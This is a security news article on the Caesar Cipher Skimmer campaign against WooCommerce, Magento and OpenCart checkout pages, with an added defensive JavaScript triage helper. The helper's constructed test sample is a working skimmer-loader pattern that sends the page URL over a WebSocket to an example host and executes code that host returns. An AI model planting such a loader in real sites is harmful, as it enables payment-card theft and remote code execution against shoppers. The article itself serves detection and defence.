A new credit card web skimmer, dubbed Caesar Cipher Skimmer, has been observed targeting multiple content management system (CMS) platforms, including WordPress, Magento, and OpenCart.
A web skimmer is malware planted on e-commerce websites to steal financial and payment data entered by shoppers.
According to Sucuri, the latest campaign tampers with the checkout PHP file shipped with the WooCommerce plugin for WordPress (“form-checkout.php”) in order to harvest credit card details.
“For several months, these injections have been refined to appear less conspicuous than a lengthy obfuscated script,” said security researcher Ben Martin, adding that the malware is disguised as Google Analytics and Google Tag Manager code.
The skimmer uses the letter-substitution technique of the Caesar cipher to turn the malicious code into a scrambled string, hiding the external domain that hosts the payload. A Caesar shift has only 25 possible keys, so this defeats naive string matching on the domain name but is trivial to reverse by trying every shift.
The affected sites are believed to have been compromised earlier through other means, which allowed the attackers to stage a PHP script named “style.css” and “css.php” so that it passes for an HTML style sheet and escapes notice.
Those scripts in turn load another piece of obfuscated JavaScript, which opens a WebSocket connection to a further server to retrieve the actual skimmer.
“The script transmits the URL of the current web pages, empowering the assailants to deliver bespoke responses for each compromised site,” Martin said. “Certain iterations of the secondary script even ascertain if it is executed by a logged-in WordPress user and modify the response accordingly.”
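To make the loader behaviour described above concrete, here is a small triage helper written for this article; it is not code from Sucuri's report or from the skimmer itself. It flags script text that opens a WebSocket and ships the page URL, then undoes a letter shift on every quoted string in a flagged script to recover the hidden host. The sample scripts, the hidden host (a reserved example domain), the shift value of 7 and the TLD list are all constructed for the example.

```javascript
// Added example, not code from the Sucuri write-up or the skimmer: triage for a
// Caesar-style skimmer loader. (1) flag script text that opens a WebSocket and
// sends the page URL; (2) brute-force the letter shift on quoted literals in a
// flagged script to recover the concealed hostname. All inputs are constructed.

// Shift a-z / A-Z by `shift` positions (negative = undo). Digits, dots and
// hyphens pass through, which is why a shifted hostname still looks like one.
function caesarShift(text, shift) {
  const k = ((shift % 26) + 26) % 26;
  return text.replace(/[a-zA-Z]/g, (c) => {
    const base = c <= "Z" ? 65 : 97;
    return String.fromCharCode(((c.charCodeAt(0) - base + k) % 26) + base);
  });
}

// Every shift of a hostname still matches a hostname regex, so the useful
// discriminator is whether the last label is a TLD we recognise (assumed list).
const KNOWN_TLDS = new Set(["com", "net", "org", "io", "ru", "su", "info", "biz", "xyz", "top", "cc", "tk"]);
const HOSTNAME_RE = /^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,}$/i;

// Try all 25 non-trivial shifts; return those that decode to a plausible host.
function recoverHostnames(scrambled) {
  const hits = [];
  for (let shift = 1; shift < 26; shift++) {
    const candidate = caesarShift(scrambled, -shift);
    const tld = candidate.slice(candidate.lastIndexOf(".") + 1).toLowerCase();
    if (HOSTNAME_RE.test(candidate) && KNOWN_TLDS.has(tld)) {
      hits.push({ shift, hostname: candidate });
    }
  }
  return hits;
}

// Loader traits from the report: a WebSocket is opened and the current page
// URL is sent over it so the server can tailor the payload per site.
function looksLikeWsLoader(script) {
  const opensSocket = /new\s+WebSocket\s*\(/.test(script);
  const sendsUrl = /\.send\s*\([^)]*(location\.href|document\.URL|location\.toString)/.test(script);
  return opensSocket && sendsUrl;
}

// For a flagged script, pull every quoted literal of 4+ characters and try to
// turn it back into a hostname.
function extractHiddenHosts(script) {
  const literals = [...script.matchAll(/["']([^"'\\]{4,})["']/g)].map((m) => m[1]);
  const found = [];
  for (const lit of literals) {
    for (const hit of recoverHostnames(lit)) found.push({ literal: lit, ...hit });
  }
  return found;
}

// Constructed samples: a benign tag-manager-style snippet, and a loader that
// hides its C2 host behind a shift of 7 (its inline decoder adds 19 = 26 - 7).
const HIDDEN_HOST = "tagmanager-cdn.example.net"; // reserved example domain
const SAMPLE_SCRIPTS = [
  `window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date());`,
  `var h = '${caesarShift(HIDDEN_HOST, 7)}', s = ''; for (var i = 0; i < h.length; i++) { var c = h.charCodeAt(i); s += (c > 96 && c < 123) ? String.fromCharCode((c - 97 + 19) % 26 + 97) : h[i]; }
   var ws = new WebSocket('wss://' + s + '/ws'); ws.onopen = function () { ws.send(location.href); }; ws.onmessage = function (e) { (new Function(e.data))(); };`,
];

// Returns one record per flagged script: its index and any recovered hosts.
function triage(scripts) {
  return scripts
    .map((script, index) => ({ index, flagged: looksLikeWsLoader(script), hosts: extractHiddenHosts(script) }))
    .filter((r) => r.flagged);
}

console.log(JSON.stringify(triage(SAMPLE_SCRIPTS), null, 2));
```

Run against the constructed samples, only the second script is flagged, and the scrambled literal decodes at shift 7 to the example host. In a real investigation the TLD list and the WebSocket regex are the two places to tune: the first governs false positives in the brute force, the second what counts as a loader.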
Some versions of the script contain source comments written in Russian, suggesting that the operators are Russian speakers.
WooCommerce's form-checkout.php is not the only delivery vector: attackers have also been seen abusing the legitimate WPCode plugin to inject the malicious code into the site's database.
On Magento sites, the JavaScript is injected into database tables such as core_config_data. How the skimmer is deployed on OpenCart sites is not yet known.
WordPress's popularity as a website platform and its large plugin ecosystem make it an attractive target, giving attackers a broad attack surface to work with.
Site owners should keep their CMS software and plugins up to date, enforce strong password hygiene, and regularly check for suspicious administrator accounts. Given the injection points named above, it is also worth reviewing checkout templates and configuration tables for script tags that were never added deliberately.